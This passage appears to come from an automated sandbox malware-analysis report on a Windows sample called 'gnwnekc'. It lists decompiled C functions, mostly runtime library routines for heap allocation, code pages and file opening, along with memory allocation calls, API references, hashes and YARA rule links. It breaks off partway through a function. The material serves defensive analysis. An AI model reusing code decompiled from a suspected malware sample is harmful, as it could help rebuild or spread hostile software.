									if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
										goto L13;
									} else {
										_t74 = E00403C2C(_t108, _t111, _a4, _t111, _v12);
									}
								}
							}
						} else {
							asm("cdq");
							_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
							asm("sbb ecx, edx");
						}
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
						} else {
							__eflags = _t111;
							if(_t111 < 0) {
								goto L17;
							} else {
								goto L7;
							}
						}
					}
					return _t74;
				} else {
					 *((intOrPtr*)(E004065F6(_t119))) = 0x16;
					return E00405C88() | 0xffffffff;
				}
			}

0x00403f84
0x00403f8c
0x00403f90
0x00403fae
0x00403fb4
0x00403fb9
0x00403fbb
0x00403fbe
0x00403fc0
0x00403fc0
0x00403fc9
0x00403fce
0x00403fd0
0x00403fd3
0x00403fd6
0x00403fd8
0x00403fdb
0x00403fdd
0x00403fed
0x00403ff0
0x00403ff4
0x00403ff6
0x00404011
0x00404014
0x00404017
0x00404021
0x00404028
0x0040402b
0x00404033
0x00404036
0x00404037
0x00404039
0x0040403c
0x0040403f
0x004040a0
0x004040a2
0x00000000
0x004040a4
0x004040a4
0x004040a9
0x00000000
0x004040a9
0x00404041
0x00404041
0x00404045
0x00404048
0x0040404b
0x0040406f
0x0040406f
0x00404076
0x0040407b
0x004040b6
0x004040b6
0x0040407d
0x0040407d
0x00404088
0x0040408d
0x00404090
0x00404092
0x00404092
0x004040b9
0x004040be
0x004040c1
0x004040c3
0x004040c9
0x004040cd
0x004040cf
0x004040e2
0x004040e6
0x004040ee
0x004040f3
0x004040fb
0x004040fb
0x004040fd
0x004040ff
0x00000000
0x004040d1
0x004040d8
0x004040dd
0x004040c5
0x00404101
0x00404101
0x00404101
0x0040404d
0x0040404d
0x00404054
0x00404059
0x00000000
0x0040405b
0x00404062
0x00404067
0x00404059
0x0040404b
0x00403ff8
0x00403ffe
0x00404001
0x00404003
0x00404005
0x00403fdf
0x00403fdf
0x004040af
0x004040af
0x00403fe5
0x00403fe5
0x00403fe7
0x00000000
0x00000000
0x00000000
0x00000000
0x00403fe7
0x00403fdf
0x00404107
0x00403f92
0x00403f97
0x00403fa8
0x00403fa8

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b903b1a8278af7aa4e6e5600d15a34813420a29582fd2a350d5dff79d8772b11
Instruction ID: b02cdb57053aba0594a8c2514fdadf61aee5174d9b96b8bf4b8544e1813a42c7
Opcode Fuzzy Hash: b903b1a8278af7aa4e6e5600d15a34813420a29582fd2a350d5dff79d8772b11
Instruction Fuzzy Hash: 5041F6B0A00108AFDB10DF58C880AAA7BB6AFC5364F24817EEA05BB3D2D779DD41C755

Uniqueness

Uniqueness Score: -1.00%

Function 004059E7 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004059E7(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t61;
				char _t67;
				signed char _t68;
				signed int _t69;
				signed int _t79;
				signed int _t80;
				char _t81;
				signed int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t58 =  *0x416010; // 0x2fe432c7
				_v8 = _t58 ^ _t91;
				_t90 = _a4;
				if( *(_t90 + 4) == 0xfde9) {
					L19:
					_t80 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t81 = 0;
					do {
						_t46 = _t81 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t61 = _t80;
							} else {
								_t53 = _t90 + 0x19; // 0x405553
								 *(_t53 + _t81) =  *(_t53 + _t81) | 0x00000020;
								_t54 = _t81 - 0x20; // -32
								_t61 = _t54;
							}
						} else {
							 *(_t90 + _t81 + 0x19) =  *(_t90 + _t81 + 0x19) | 0x00000010;
							_t52 = _t81 + 0x20; // 0x20
							_t61 = _t52;
						}
						 *(_t90 + _t81 + 0x119) = _t61;
						_t81 = _t81 + 1;
						__eflags = _t81 - _t89;
					} while (_t81 < _t89);
					L26:
					return E00401C35(_t61, _t80, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t5 = _t90 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t80 = 0;
					_t89 = 0x100;
					_t67 = 0;
					do {
						 *((char*)(_t91 + _t67 - 0x104)) = _t67;
						_t67 = _t67 + 1;
					} while (_t67 < 0x100);
					_t68 = _v1814;
					_t84 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t68;
						if(_t68 == 0) {
							break;
						}
						_t88 =  *(_t84 + 1) & 0x000000ff;
						_t69 = _t68 & 0x000000ff;
						while(1) {
							__eflags = _t69 - _t88;
							if(_t69 > _t88) {
								break;
							}
							__eflags = _t69 - _t89;
							if(_t69 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t69 - 0x104)) = 0x20;
							_t69 = _t69 + 1;
							__eflags = _t69;
						}
						_t84 = _t84 + 2;
						__eflags = _t84;
						_t68 =  *_t84;
					}
					_t14 = _t90 + 4; // 0xe8458d00
					E00406D97(_t88, _t99, _t80, 1,  &_v264, _t89,  &_v1800,  *_t14, _t80);
					_t17 = _t90 + 4; // 0xe8458d00
					_t20 = _t90 + 0x21c; // 0xba0000
					E0040A1DF(_t99, _t80,  *_t20, _t89,  &_v264, _t89,  &_v520, _t89,  *_t17, _t80); // executed
					_t22 = _t90 + 4; // 0xe8458d00
					_t24 = _t90 + 0x21c; // 0xba0000
					E0040A1DF(_t99, _t80,  *_t24, 0x200,  &_v264, _t89,  &_v776, _t89,  *_t22, _t80);
					_t79 = _t80;
					do {
						_t85 =  *(_t91 + _t79 * 2 - 0x704) & 0x0000ffff;
						if((_t85 & 0x00000001) == 0) {
							__eflags = _t85 & 0x00000002;
							if((_t85 & 0x00000002) == 0) {
								_t86 = _t80;
							} else {
								 *(_t90 + _t79 + 0x19) =  *(_t90 + _t79 + 0x19) | 0x00000020;
								_t86 =  *((intOrPtr*)(_t91 + _t79 - 0x304));
							}
						} else {
							 *(_t90 + _t79 + 0x19) =  *(_t90 + _t79 + 0x19) | 0x00000010;
							_t86 =  *((intOrPtr*)(_t91 + _t79 - 0x204));
						}
						 *(_t90 + _t79 + 0x119) = _t86;
						_t79 = _t79 + 1;
					} while (_t79 < _t89);
					goto L26;
				}
			}

0x004059f2
0x004059f9
0x004059fe
0x00405a09
0x00405b1b
0x00405b1b
0x00405b1b
0x00405b1d
0x00405b22
0x00405b24
0x00405b24
0x00405b24
0x00405b27
0x00405b2a
0x00405b2d
0x00405b39
0x00405b3c
0x00405b4b
0x00405b3e
0x00405b3e
0x00405b43
0x00405b46
0x00405b46
0x00405b46
0x00405b2f
0x00405b2f
0x00405b34
0x00405b34
0x00405b34
0x00405b4d
0x00405b54
0x00405b55
0x00405b55
0x00405b59
0x00405b67
0x00405b67
0x00405a16
0x00405a21
0x00000000
0x00405a27
0x00405a27
0x00405a29
0x00405a2e
0x00405a30
0x00405a30
0x00405a37
0x00405a38
0x00405a3c
0x00405a42
0x00405a48
0x00405a70
0x00405a70
0x00405a72
0x00000000
0x00000000
0x00405a51
0x00405a55
0x00405a67
0x00405a67
0x00405a69
0x00000000
0x00000000
0x00405a5a
0x00405a5c
0x00000000
0x00000000
0x00405a5e
0x00405a66
0x00405a66
0x00405a66
0x00405a6b
0x00405a6b
0x00405a6e
0x00405a6e
0x00405a75
0x00405a8a
0x00405a90
0x00405aa4
0x00405aab
0x00405aba
0x00405acc
0x00405ad3
0x00405adb
0x00405add
0x00405add
0x00405ae8
0x00405af8
0x00405afb
0x00405b0b
0x00405afd
0x00405afd
0x00405b02
0x00405b02
0x00405aea
0x00405aea
0x00405aef
0x00405aef
0x00405b0d
0x00405b14
0x00405b15
0x00000000
0x00405b19

APIs

GetCPInfo.KERNEL32(E8458D00,?,0040A947,0040A93B,00000000), ref: 00405A19

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 1762c74ca0e4b913682eced4d42f5d94b0d05c8e5b57da8854a2ed7d5f839106
Instruction ID: 400883b989793238faa881b6cf2a91630d1b9d1c79db2402d677a61b36455f98
Opcode Fuzzy Hash: 1762c74ca0e4b913682eced4d42f5d94b0d05c8e5b57da8854a2ed7d5f839106
Instruction Fuzzy Hash: 0B41F87060464C9ADB218A54CC84BF77BF9EB45304F6404BEE586A7182D278BA45DF25

Uniqueness

Uniqueness Score: -1.00%

Function 004086DB Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004086DB(void* __ecx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				char _v12;
				void* _v20;
				intOrPtr _v24;
				char _v32;
				void* _t26;

				_pop(_t47);
				E0040887D(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L4:
					return 0;
				} else {
					_t26 = E0040BB7D( &_v12, _v0, _v24, _a8, 0x180); // executed
					if(_t26 != 0) {
						goto L4;
					} else {
						 *0x417394 =  *0x417394 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a12 + 8)) = 0;
						 *((intOrPtr*)(_a12 + 0x1c)) = 0;
						 *((intOrPtr*)(_a12 + 4)) = 0;
						 *_a12 = 0;
						 *((intOrPtr*)(_a12 + 0x10)) = _v12;
						return _a12;
					}
				}
			}

0x004086e0
0x0040880b
0x00408817
0x00408818
0x00408819
0x00408820
0x00408879
0x0040887c
0x00408822
0x00408834
0x0040883e
0x00000000
0x00408840
0x00408843
0x0040884f
0x00408857
0x0040885d
0x00408863
0x00408869
0x00408871
0x00408878
0x00408878
0x0040883e

APIs

__wsopen_s.LIBCMT ref: 00408834

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: bbe3098154b44e24f8ef07967ef189509589ae7719c9e5bc8f15943e40f64c7f
Instruction ID: f3058be2510ef58ab18ffd39367909b0def47cbf9a42afcde85175ec133b20cc
Opcode Fuzzy Hash: bbe3098154b44e24f8ef07967ef189509589ae7719c9e5bc8f15943e40f64c7f
Instruction Fuzzy Hash: 3A114F7690410AAFCB05DF59E941D9B7BF4EF48304F14406AF809AB351DA34ED11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB4 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00404AB4(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x416f78 + _a4 * 4;
				_t28 =  *0x416010; // 0x2fe432c7
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E004049ED(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x416010;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E004022F7(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x00404abe
0x00404ac8
0x00404ace
0x00404ad3
0x00404ad5
0x00404ad8
0x00404adc
0x00404ae4
0x00404af1
0x00404afa
0x00404b19
0x00404b1e
0x00404b26
0x00404b2e
0x00404b30
0x00404b32
0x00000000
0x00404b32
0x00404b06
0x00404b0a
0x00000000
0x00000000
0x00404b13
0x00404b15
0x00000000
0x00404b15
0x00000000
0x00404ae6
0x00000000

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b86757478668675ae98b3905124ed1fd51d19a63a5f13f53f217cac3b47b87
Instruction ID: 325199db4a59cac74f9b1efa5e1aed84ca31ed36c6fee3017b434cf5dca11011
Opcode Fuzzy Hash: 89b86757478668675ae98b3905124ed1fd51d19a63a5f13f53f217cac3b47b87
Instruction Fuzzy Hash: E301F9B77001115FDB15CE6AEC40A9737A6BBC53247158136FA11EB1D4DB34D802DA88

Uniqueness

Uniqueness Score: -1.00%

Function 004083E1 Relevance: 1.6, APIs: 1, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004083E1(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E0040695A(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E004048D4(__eflags, _t4, 0xfa0, 0); // executed
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00405BB5(0);
				return _t35;
			}

0x004083e7
0x004083ee
0x004083f3
0x004083f7
0x004083fe
0x00408404
0x00408404
0x0040840a
0x0040840c
0x0040840f
0x0040840f
0x00408412
0x00408414
0x0040841a
0x0040841e
0x00408423
0x00408427
0x00408429
0x0040842c
0x00408432
0x00408439
0x0040843d
0x00408441
0x00408444
0x00408447
0x00408447
0x0040844b
0x0040844e
0x00408400
0x00408400
0x00408400
0x00408450
0x0040845b

APIs

Part of subcall function 0040695A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00404E28,00000001,00000364,00000005,000000FF,?,00407C5B,?,00000004,00000000,?,?), ref: 0040699B

_free.LIBCMT ref: 00408450

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 994fe78c4b8ea54ac6b2ada91a40809d863b34f685298993fca6dac3b4cddb82
Instruction ID: 57797b57e74558e6e7400518e33e6e6bfc81a6e9da3c02868b195b5ddb59b100
Opcode Fuzzy Hash: 994fe78c4b8ea54ac6b2ada91a40809d863b34f685298993fca6dac3b4cddb82
Instruction Fuzzy Hash: 130149B26003576BC721DF69C88199AFB98EB443B4F11063EE585B76C0EB746C15CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 003C0F1D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003C0EBF: GetSystemInfo.KERNELBASE(?), ref: 003C0EDC

VirtualAllocExNuma.KERNELBASE(00000000), ref: 003C0F82

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: AllocInfoNumaSystemVirtual
String ID:
API String ID: 449148690-0
Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
Instruction ID: 2d43405ac81ac07e5cf38a18b0a24f3a7a9806ea809714a2fec08ddabb9a12f0
Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
Instruction Fuzzy Hash: D1F04470D44358FAEB267BF08806F6D77689F00301F01445CB640EE1C3DA795E404765

Uniqueness

Uniqueness Score: -1.00%

Function 0040695A Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040695A(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x417154, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0040349D();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E004065F6(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00405E78(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00406960
0x00406965
0x00406973
0x00406973
0x00406979
0x0040697b
0x0040697b
0x00406992
0x0040699b
0x004069a3
0x00000000
0x00000000
0x00406983
0x00406985
0x004069a7
0x004069ac
0x004069b2
0x00000000
0x004069b2
0x0040698e
0x00406990
0x00000000
0x00000000
0x00406990
0x00000000
0x00406992
0x0040696b
0x00406971
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00404E28,00000001,00000364,00000005,000000FF,?,00407C5B,?,00000004,00000000,?,?), ref: 0040699B

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 70b6405e5ebb775fc93c99171bc780f1edbd6ba9bf33adcd02fe92a6aed6a904
Instruction ID: f06a366171da53cdbaec28c302755f86bbff63ae5dee198f7f4852c7355c1638
Opcode Fuzzy Hash: 70b6405e5ebb775fc93c99171bc780f1edbd6ba9bf33adcd02fe92a6aed6a904
Instruction Fuzzy Hash: F6F0B4B16041246BDF215F66DD06B6B379C9F41760F168037AC06BAAD0CA3CD92046ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040C494 Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E0040C494(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t24;

				 *0x417394 =  *0x417394 + 1;
				_t24 = _a4;
				_t11 = E004069B7(0x1000); // executed
				 *((intOrPtr*)(_t24 + 4)) = _t11;
				E00405BB5(0);
				if( *((intOrPtr*)(_t24 + 4)) == 0) {
					asm("lock or [eax], ecx");
					_t5 = _t24 + 0x14; // 0x40bdcb
					 *((intOrPtr*)(_t24 + 4)) = _t5;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t24 + 0x18)) = 0x1000;
				_t8 = _t24 + 4; // 0x8524c483
				_t15 =  *_t8;
				 *(_t24 + 8) =  *(_t24 + 8) & 0x00000000;
				 *_t24 = _t15;
				return _t15;
			}

0x0040c499
0x0040c4a0
0x0040c4aa
0x0040c4b1
0x0040c4b4
0x0040c4c2
0x0040c4d1
0x0040c4d4
0x0040c4d9
0x0040c4dc
0x0040c4c4
0x0040c4c4
0x0040c4c7
0x0040c4c7
0x0040c4dd
0x0040c4e0
0x0040c4e0
0x0040c4e3
0x0040c4e8
0x0040c4ec

APIs

Part of subcall function 004069B7: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0040B9FC,?,00000000,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D), ref: 004069E9

_free.LIBCMT ref: 0040C4B4

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 30ea1045e4792a0e76e6850c3985705f7b65e6bd33c69925ed7ebdd442a2e863
Instruction ID: e309847e7a27feb1f35353a2295d216bb98e89f72aa10d9439f55caf65929490
Opcode Fuzzy Hash: 30ea1045e4792a0e76e6850c3985705f7b65e6bd33c69925ed7ebdd442a2e863
Instruction Fuzzy Hash: 8DF062721057049FE3249F45D441752F7FCEF80711F10843FE29A9B9E1D6B4B4418B58

Uniqueness

Uniqueness Score: -1.00%

Function 004069B7 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004069B7(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E004065F6(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x417154, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0040349D();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00405E78(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x004069bd
0x004069c3
0x004069f5
0x004069fa
0x00406a00
0x00000000
0x00406a00
0x004069c7
0x004069c9
0x004069c9
0x004069e0
0x004069e9
0x004069f1
0x00000000
0x00000000
0x004069d1
0x004069d3
0x00000000
0x00000000
0x004069dc
0x004069de
0x00000000
0x00000000
0x004069de
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0040B9FC,?,00000000,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D), ref: 004069E9

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9cd2b293b077574587b905ba5da465399fdc99a470a1b864e05d1ad3816befe6
Instruction ID: 696dda7507fdce524743ac4da572193aba961d08adb2abeda623d5712d6107d6
Opcode Fuzzy Hash: 9cd2b293b077574587b905ba5da465399fdc99a470a1b864e05d1ad3816befe6
Instruction Fuzzy Hash: BAE0E57220422566E62127669D09B9B3A4C8B523A0F03413BAC07B6AD0DA7CCC2051ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF88 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040BF88(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x0040bfa5
0x0040bfac

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,0040BC46,?,?,00000000), ref: 0040BFA5

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 124d094fe7c0ba865b100e04e826ad1cb4a7fe8c69d529bb9dcbbb0255295700
Instruction ID: 336ec5a2ecadef58ad1f08cdff2340f89a48fd4bb399667f2e12dd5f425b4386
Opcode Fuzzy Hash: 124d094fe7c0ba865b100e04e826ad1cb4a7fe8c69d529bb9dcbbb0255295700
Instruction Fuzzy Hash: 44D06C3200010DBBDF028F84DC06EDA3BAAFB88754F028150BA1856020C772E861AB94

Uniqueness

Uniqueness Score: -1.00%

Function 003C0E1F Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 003C0E5C

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
Instruction ID: 152d6d291490822ad1290247208050b2f93bb0d33252766a61d4da391fccc99e
Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
Instruction Fuzzy Hash: 8A113670D44258EFDB05EBA8CC49BAEBBB4EB04304F204899E940FB291D2714E408B90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401846 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401846(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
